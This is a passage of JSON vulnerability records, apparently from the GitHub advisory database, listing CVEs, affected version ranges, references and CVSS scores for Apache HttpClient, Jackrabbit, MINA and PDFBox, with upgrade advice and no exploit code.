"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-pqwh-44jj-p5rm/GHSA-pqwh-44jj-p5rm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4366" }, { "type": "WEB", "url": "https://github.com/apache/httpcomponents-client/commit/08140864e3e4c0994e094c4cf0507932baf6a66" }, { "type": "WEB", "url": "http://svn.apache.org/r1528614" }, { "type": "WEB", "url": "http://www.apache.org/dist/httpcomponents/httpclient/RELEASE_NOTES-4.3.x.txt" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-06-09T22:47:59Z", "nvd_published_at": "2017-10-30T19:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cxvc-g8f2-4gmm", "published": "2025-09-08T09:31:09Z", "modified": "2025-11-05T21:26:56.180617Z", "aliases": [ "CVE-2025-58782" ], "summary": "Apache Jackrabbit: Core and JCR Commons are vulnerable to Deserialization of Untrusted Data", "details": "There is a serialization of Untrusted Data vulnerability in Apache Jackrabbit Core and Apache Jackrabbit JCR Commons.\n\nThis issue affects Apache Jackrabbit Core: from 1.0.0 through 2.22.1; Apache Jackrabbit JCR Commons: from 1.0.0 through 2.22.1.\n\nDeployments that accept JNDI URIs for JCR lookup from untrusted users allows them to inject malicious JNDI references, potentially leading to arbitrary code execution through deserialization of untrusted data. Users are recommended to upgrade to version 2.22.2. JCR lookup through JNDI has been disabled by default in 2.22.2. Users of this feature need to enable it explicitly and are adviced to review their use of JNDI URI for JCR lookup.", "affected": [ { "package": { "name": "org.apache.jackrabbit:jackrabbit-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.0" }, { "fixed": "2.22.2" } ] } ], "versions": [ "1.0", "1.0.1", "1.1", "1.1.1", "1.2.1", "1.2.2", "1.2.3", "1.3", "1.3.1", "1.3.3", "1.4", "1.4.1", "1.4.10", "1.4.11", "1.4.12", "1.4.2", "1.4.3", "1.4.4", "1.4.5", "1.4.6", "1.4.7", "1.4.8", "1.4.9", "1.5.0", "1.5.2", "1.5.3", "1.5.4", "1.5.5", "1.5.6", "1.5.7", "1.6.0", "1.6.1", "1.6.2", "1.6.4", "1.6.5", "2.0-beta1", "2.0-beta3", "2.0-beta4", "2.0-beta5", "2.0-beta6", "2.0.0", "2.0.3", "2.0.5", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.5", "2.1.6", "2.10.0", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.10.6", "2.10.7", "2.10.8", "2.10.9", "2.11.0", "2.11.1", "2.11.2", "2.11.3", "2.12.0", "2.12.1", "2.12.10", "2.12.11", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.12.7", "2.12.8", "2.12.9", "2.13.0", "2.13.1", "2.13.2", "2.13.3", "2.13.4", "2.13.5", "2.13.6", "2.13.7", "2.14.0", "2.14.1", "2.14.10", "2.14.2", "2.14.3", "2.14.4", "2.14.5", "2.14.6", "2.14.7", "2.14.8", "2.14.9", "2.15.0", "2.15.1", "2.15.2", "2.15.3", "2.15.4", "2.15.5", "2.15.6", "2.15.7", "2.15.8", "2.16.0", "2.16.1", "2.16.10", "2.16.2", "2.16.3", "2.16.4", "2.16.5", "2.16.6", "2.16.7", "2.16.8", "2.16.9", "2.17.0", "2.17.1", "2.17.2", "2.17.3", "2.17.4", "2.17.5", "2.17.6", "2.17.7", "2.18.0", "2.18.1", "2.18.2", "2.18.3", "2.18.4", "2.18.5", "2.18.6", "2.19.0", "2.19.1", "2.19.2", "2.19.3", "2.19.4", "2.19.5", "2.19.6", "2.2.0", "2.2.1", "2.2.10", "2.2.11", "2.2.12", "2.2.13", "2.2.2", "2.2.4", "2.2.5", "2.2.7", "2.2.8", "2.2.9", "2.20.0", "2.20.1", "2.20.10", "2.20.11", "2.20.12", "2.20.13", "2.20.14", "2.20.15", "2.20.16", "2.20.17", "2.20.2", "2.20.3", "2.20.4", "2.20.5", "2.20.6", "2.20.7", "2.20.8", "2.20.9", "2.21.0", "2.21.1", "2.21.10", "2.21.11", "2.21.12", "2.21.13", "2.21.14", "2.21.15", "2.21.16", "2.21.17", "2.21.18", "2.21.19", "2.21.2", "2.21.20", "2.21.21", "2.21.22", "2.21.23", "2.21.24", "2.21.25", "2.21.26-beta", "2.21.27-beta", "2.21.3", "2.21.4", "2.21.5", "2.21.6", "2.21.7", "2.21.8", "2.21.9", "2.22.0", "2.22.1", "2.3.0", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.3.6", "2.3.7", "2.4.0", "2.4.1", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.6", "2.4.7", "2.4.8", "2.5.0", "2.5.1", "2.5.2", "2.5.3", "2.6.0", "2.6.1", "2.6.10", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.8", "2.6.9", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.8.0", "2.8.1", "2.8.10", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.9", "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-cxvc-g8f2-4gmm/GHSA-cxvc-g8f2-4gmm.json" } }, { "package": { "name": "org.apache.jackrabbit:jackrabbit-jcr-commons", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-jcr-commons" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.0" }, { "fixed": "2.22.2" } ] } ], "versions": [ "1.0", "1.0.1", "1.1", "1.1.1", "1.2.1", "1.2.2", "1.2.3", "1.3", "1.3.1", "1.3.3", "1.4", "1.4.2", "1.5.0", "1.5.2", "1.5.3", "1.5.5", "1.6.0", "1.6.1", "1.6.2", "1.6.4", "1.6.5", "2.0-beta1", "2.0-beta3", "2.0-beta4", "2.0-beta5", "2.0-beta6", "2.0.0", "2.0.3", "2.0.5", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.5", "2.1.6", "2.10.0", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.10.6", "2.10.7", "2.10.8", "2.10.9", "2.11.0", "2.11.1", "2.11.2", "2.11.3", "2.12.0", "2.12.1", "2.12.10", "2.12.11", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.12.7", "2.12.8", "2.12.9", "2.13.0", "2.13.1", "2.13.2", "2.13.3", "2.13.4", "2.13.5", "2.13.6", "2.13.7", "2.14.0", "2.14.1", "2.14.10", "2.14.2", "2.14.3", "2.14.4", "2.14.5", "2.14.6", "2.14.7", "2.14.8", "2.14.9", "2.15.0", "2.15.1", "2.15.2", "2.15.3", "2.15.4", "2.15.5", "2.15.6", "2.15.7", "2.15.8", "2.16.0", "2.16.1", "2.16.10", "2.16.2", "2.16.3", "2.16.4", "2.16.5", "2.16.6", "2.16.7", "2.16.8", "2.16.9", "2.17.0", "2.17.1", "2.17.2", "2.17.3", "2.17.4", "2.17.5", "2.17.6", "2.17.7", "2.18.0", "2.18.1", "2.18.2", "2.18.3", "2.18.4", "2.18.5", "2.18.6", "2.19.0", "2.19.1", "2.19.2", "2.19.3", "2.19.4", "2.19.5", "2.19.6", "2.2.0", "2.2.1", "2.2.10", "2.2.11", "2.2.12", "2.2.13", "2.2.2", "2.2.4", "2.2.5", "2.2.7", "2.2.8", "2.2.9", "2.20.0", "2.20.1", "2.20.10", "2.20.11", "2.20.12", "2.20.13", "2.20.14", "2.20.15", "2.20.16", "2.20.17", "2.20.2", "2.20.3", "2.20.4", "2.20.5", "2.20.6", "2.20.7", "2.20.8", "2.20.9", "2.21.0", "2.21.1", "2.21.10", "2.21.11", "2.21.12", "2.21.13", "2.21.14", "2.21.15", "2.21.16", "2.21.17", "2.21.18", "2.21.19", "2.21.2", "2.21.20", "2.21.21", "2.21.22", "2.21.23", "2.21.24", "2.21.25", "2.21.26-beta", "2.21.27-beta", "2.21.3", "2.21.4", "2.21.5", "2.21.6", "2.21.7", "2.21.8", "2.21.9", "2.22.0", "2.22.1", "2.3.0", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.3.6", "2.3.7", "2.4.0", "2.4.1", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.6", "2.4.7", "2.4.8", "2.5.0", "2.5.1", "2.5.2", "2.5.3", "2.6.0", "2.6.1", "2.6.10", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.7", "2.6.8", "2.6.9", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.8.0", "2.8.1", "2.8.10", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.9", "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-cxvc-g8f2-4gmm/GHSA-cxvc-g8f2-4gmm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58782" }, { "type": "WEB", "url": "https://github.com/apache/jackrabbit/pull/229" }, { "type": "PACKAGE", "url": "https://github.com/apache/jackrabbit" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/JCR-5135" }, { "type": "WEB", "url": "https://lists.apache.org/thread/t4wdrost6dh17dh406g792j9wq6xmy6v" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/09/06/3" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2025-09-09T15:14:38Z", "nvd_published_at": "2025-09-08T09:15:30Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9fc7-rhq3-wm7x", "published": "2022-05-17T03:48:02Z", "modified": "2024-02-16T08:06:20.906860Z", "aliases": [ "CVE-2016-6801" ], "summary": "Apache Jackrabbit Authentication Hijacking Vulnerability", "details": "Cross-site request forgery (CSRF) vulnerability in the CSRF content-type check in Jackrabbit-Webdav in Apache Jackrabbit 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.3, 2.10.x before 2.10.4, 2.12.x before 2.12.4, and 2.13.x before 2.13.3 allows remote attackers to hijack the authentication of unspecified victims for requests that create a resource via an HTTP POST request with a (1) missing or (2) crafted Content-Type header.", "affected": [ { "package": { "name": "org.apache.jackrabbit:jackrabbit-webdav", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-webdav" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.4.0" }, { "fixed": "2.4.6" } ] } ], "versions": [ "2.4.0", "2.4.1", "2.4.2", "2.4.3", "2.4.4", "2.4.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9fc7-rhq3-wm7x/GHSA-9fc7-rhq3-wm7x.json" } }, { "package": { "name": "org.apache.jackrabbit:jackrabbit-webdav", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-webdav" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.6.0" }, { "fixed": "2.6.6" } ] } ], "versions": [ "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9fc7-rhq3-wm7x/GHSA-9fc7-rhq3-wm7x.json" } }, { "package": { "name": "org.apache.jackrabbit:jackrabbit-webdav", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-webdav" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9fc7-rhq3-wm7x/GHSA-9fc7-rhq3-wm7x.json" } }, { "package": { "name": "org.apache.jackrabbit:jackrabbit-webdav", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-webdav" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.10.0" }, { "fixed": "2.10.4" } ] } ], "versions": [ "2.10.0", "2.10.1", "2.10.2", "2.10.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9fc7-rhq3-wm7x/GHSA-9fc7-rhq3-wm7x.json" } }, { "package": { "name": "org.apache.jackrabbit:jackrabbit-webdav", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-webdav" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.12.0" }, { "fixed": "2.12.4" } ] } ], "versions": [ "2.12.0", "2.12.1", "2.12.2", "2.12.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9fc7-rhq3-wm7x/GHSA-9fc7-rhq3-wm7x.json" } }, { "package": { "name": "org.apache.jackrabbit:jackrabbit-webdav", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-webdav" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.13.0" }, { "fixed": "2.13.3" } ] } ], "versions": [ "2.13.0", "2.13.1", "2.13.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9fc7-rhq3-wm7x/GHSA-9fc7-rhq3-wm7x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6801" }, { "type": "WEB", "url": "https://github.com/apache/jackrabbit/commit/16f2f02fcaef6202a2bf24c449d4fd10eb98f08d" }, { "type": "WEB", "url": "https://github.com/apache/jackrabbit/commit/ea75d7c2aeaafecd9ab97736bf81c5616f703244" }, { "type": "WEB", "url": "https://github.com/apache/jackrabbit/commit/eae001a54aae9c243ac06b5c8f711b2cb2038700" }, { "type": "PACKAGE", "url": "https://github.com/apache/jackrabbit" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/JCR-4009" }, { "type": "WEB", "url": "https://web.archive.org/web/20210123170657/http://www.securityfocus.com/bid/92966" }, { "type": "WEB", "url": "http://www.debian.org/security/2016/dsa-3679" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/09/14/6" } ], "database_specific": { "cwe_ids": [ "CWE-352" ], "github_reviewed": true, "github_reviewed_at": "2023-07-31T22:54:02Z", "nvd_published_at": "2016-09-21T14:25:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5h29-qq92-wj7f", "published": "2022-05-24T16:57:28Z", "modified": "2023-11-08T04:00:32.405493Z", "aliases": [ "CVE-2019-0231" ], "summary": "Cleartext Transmission of Sensitive Information in Apache MINA", "details": "Handling of the close_notify SSL/TLS message does not lead to a connection closure, leading the server to retain the socket opened and to have the client potentially receive clear text messages afterward. Mitigation: 2.0.20 users should migrate to 2.0.21, 2.1.0 users should migrate to 2.1.1. This issue affects: Apache MINA.", "affected": [ { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.0.21" } ] } ], "versions": [ "1.0.0", "1.0.1", "1.0.10", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.1.0", "1.1.1", "1.1.2", "1.1.3", "1.1.4", "1.1.5", "1.1.6", "1.1.7", "2.0.0", "2.0.0-M1", "2.0.0-M2", "2.0.0-M3", "2.0.0-M4", "2.0.0-M5", "2.0.0-M6", "2.0.0-RC1", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.0.20", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-5h29-qq92-wj7f/GHSA-5h29-qq92-wj7f.json" } }, { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.1.0" }, { "fixed": "2.1.1" } ] } ], "versions": [ "2.1.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-5h29-qq92-wj7f/GHSA-5h29-qq92-wj7f.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0231" }, { "type": "WEB", "url": "http://mina.apache.org/mina-project/index.html#mina-211-mina-2021-released-posted-on-april-14-2019" } ], "database_specific": { "cwe_ids": [ "CWE-319" ], "github_reviewed": true, "github_reviewed_at": "2022-06-29T15:48:56Z", "nvd_published_at": "2019-10-01T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6mcm-j9cj-3vc3", "published": "2021-11-03T17:30:35Z", "modified": "2023-11-08T04:07:03.734341Z", "aliases": [ "CVE-2021-41973" ], "summary": "Infinite loop in Apache MINA", "details": "In Apache MINA, a specifically crafted, malformed HTTP request may cause the HTTP Header decoder to loop indefinitely. The decoder assumed that the HTTP Header begins at the beginning of the buffer and loops if there is more data than expected. Please update MINA to 2.1.5 or greater.", "affected": [ { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.1.0" }, { "fixed": "2.1.5" } ] } ], "versions": [ "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/11/GHSA-6mcm-j9cj-3vc3/GHSA-6mcm-j9cj-3vc3.json" } }, { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.0.22" } ] } ], "versions": [ "1.0.0", "1.0.1", "1.0.10", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.1.0", "1.1.1", "1.1.2", "1.1.3", "1.1.4", "1.1.5", "1.1.6", "1.1.7", "2.0.0", "2.0.0-M1", "2.0.0-M2", "2.0.0-M3", "2.0.0-M4", "2.0.0-M5", "2.0.0-M6", "2.0.0-RC1", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/11/GHSA-6mcm-j9cj-3vc3/GHSA-6mcm-j9cj-3vc3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41973" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0b907da9340d5ff4e6c1a4798ef4e79700a668657f27cca8a39e9250%40%3Cdev.mina.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/11/01/2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/11/01/8" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2021-11-02T19:48:48Z", "nvd_published_at": "2021-11-01T09:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-76h9-2vwh-w278", "published": "2024-12-25T12:30:45Z", "modified": "2025-02-12T18:32:35.851404Z", "aliases": [ "CVE-2024-52046" ], "related": [ "CGA-69xr-35vw-ch6p" ], "summary": "Apache MINA Deserialization RCE Vulnerability", "details": "The `ObjectSerializationDecoder` in Apache MINA uses Java’s native deserialization protocol to process incoming serialized data but lacks the necessary security checks and defenses. This vulnerability allows attackers to exploit the deserialization process by sending specially crafted malicious serialized data, potentially leading to remote code execution (RCE) attacks.\n\t\nThis issue affects MINA core versions 2.0.X, 2.1.X and 2.2.X, and will be fixed by the releases 2.0.27, 2.1.10 and 2.2.4.\n\nIt's also important to note that an application using MINA core library will only be affected if the IoBuffer#getObject() method is called, and this specific method is potentially called when adding a ProtocolCodecFilter instance using the `ObjectSerializationCodecFactory` class in the filter chain. If your application is specifically using those classes, you have to upgrade to the latest version of MINA core library.\n\nUpgrading will  not be enough: you also need to explicitly allow the classes the decoder will accept in the ObjectSerializationDecoder instance, using one of the three new methods:\n\n1. \n     * Accept class names where the supplied ClassNameMatcher matches for deserialization, unless they are otherwise rejected.\n * `@param classNameMatcher` the matcher to use\n * / `public void accept(ClassNameMatcher classNameMatcher)`\n\n2. \n * Accept class names that match the supplied pattern for deserialization, unless they are otherwise rejected.\n * `@param` pattern standard Java regexp\n * / `public void accept(Pattern pattern)`\n\n3.\n * Accept the wildcard specified classes for deserialization, unless they are otherwise rejected.\n * `@param` patterns Wildcard file name patterns as defined by `{@link org.apache.commons.io.FilenameUtils#wildcardMatch(String, String) FilenameUtils.wildcardMatch}`\n * / `public void accept(String... patterns)`\n\nBy default, the decoder will reject *all* classes that will be present in the incoming data.\n\nNote: The FtpServer, SSHd and Vysper sub-project are not affected by this issue.", "affected": [ { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.2.0" }, { "fixed": "2.2.4" } ] } ], "versions": [ "2.2.0", "2.2.1", "2.2.2", "2.2.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-76h9-2vwh-w278/GHSA-76h9-2vwh-w278.json" } }, { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.1.0" }, { "fixed": "2.1.10" } ] } ], "versions": [ "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.1.6", "2.1.7", "2.1.8", "2.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-76h9-2vwh-w278/GHSA-76h9-2vwh-w278.json" } }, { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0-M1" }, { "fixed": "2.0.27" } ] } ], "versions": [ "2.0.0", "2.0.0-M1", "2.0.0-M2", "2.0.0-M3", "2.0.0-M4", "2.0.0-M5", "2.0.0-M6", "2.0.0-RC1", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-76h9-2vwh-w278/GHSA-76h9-2vwh-w278.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52046" }, { "type": "PACKAGE", "url": "https://github.com/apache/mina" }, { "type": "WEB", "url": "https://lists.apache.org/thread/4wxktgjpggdbto15d515wdctohb0qmv8" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250103-0001" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/12/25/1" } ], "database_specific": { "cwe_ids": [ "CWE-502", "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2024-12-26T15:59:46Z", "nvd_published_at": "2024-12-25T10:15:05Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2h3j-m7gr-25xj", "published": "2021-06-16T17:56:46Z", "modified": "2024-03-15T05:17:16.776669Z", "aliases": [ "CVE-2021-27807" ], "summary": "Excessive Iteration Denial of Service in Apache PDFBox", "details": "A carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.23" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-2h3j-m7gr-25xj/GHSA-2h3j-m7gr-25xj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27807" }, { "type": "WEB", "url": "https://github.com/apache/pdfbox/commit/5c5a837140fbb4ef78bb5ef9f29ad537c872c83e" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://svn.apache.org/viewvc?view=revision\u0026revision=1886911" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6PT72QOFDXLJ7PLTN66EMG5EHPTE7TFZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6KDA2U4KL2N3XT3PM4ZJEBBA6JJIH2G4" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2AVLKAHFMPH72TTP25INPZPGX5FODK3H" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re1e35881482e07dc2be6058d9b44483457f36133cac67956686ad9b9@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc69140d894c6a9c67a8097a25656cce59b46a5620c354ceba10543c3@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raa35746227f3f8d50fff1db9899524423a718f6f35cd39bd4769fa6c@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ffe179385637b0b5cbdabd0246118005b4b8232909d2d14cd68ccd3@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r818058ff1e4b9f6bef4e5a2e74faff38cb3d3885c1e2db398bc55cfb@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r818058ff1e4b9f6bef4e5a2e74faff38cb3d3885c1e2db398bc55cfb%40%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7ee634c21816c69ce829d0c41f35afa2a53a99bdd3c7cce8644fdc0e@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6e067a6d83ccb6892d0ff867bd216704f21fb0b6a854dea34be04f12@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5c8e2125d18af184c80f7a986fbe47eaf0d30457cd450133adc235ac@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": 